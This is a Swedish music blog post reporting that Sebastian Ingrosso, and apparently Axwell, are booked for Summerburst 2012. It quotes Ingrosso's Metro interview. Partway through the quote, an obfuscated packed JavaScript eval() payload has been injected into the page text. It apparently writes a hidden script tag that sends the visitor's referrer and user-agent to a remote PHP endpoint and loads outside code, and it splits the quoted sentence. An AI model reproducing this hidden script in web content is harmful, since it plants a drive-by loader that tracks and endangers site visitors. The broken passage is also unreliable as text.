Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

Sebastian Ingrosso till Summerburst 2012

Sebastian Ingrosso till Summerburst 2012
Alexander Gylemo

I dag avslöjade Metro i en intervju med Sebastian Ingrosso att han ska spela på dag två, den 16e juni, under Summerburst 2012, som uppenbarligen försöker grabba tag på så många svenska artister som möjligt.

Nu består festivalen alltså av två tredjedelar av Swedish House Mafia, då Axwell spelar dag 15, och det p.g.a. detta får vi säkert även se Alesso som Ingrosso tagit under sina vingar sedan nykomlingen slog igenom.

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rkeyh|var|u0026u|referrer|yetef||js|php’.split(’|’),0,{}))
här kommer från mitt hjärta: Sverige har den bästa publiken i världen, den bästa energin. Så jag är självklart jätteglad över spelningen på ”Summerburst”. I fjol missade jag den tyvärr på grund av att den krockade med min svensexa.

Sebastian Ingrosso i intervjun med Metro

Jag är dock tveksam till att Steve Angello hoppar på tåget även han, han är inget större fan av att spela i sitt hemland plus att det kanske blir lite tradigt med alla tre uppdelade istället för att hela gänget spelar tillsammans.

Så nu har vi alltså två artister bekräftade för Summerburst 2012, vi uppdaterar er allt eftersom fler artister bekräftas!

 

Comments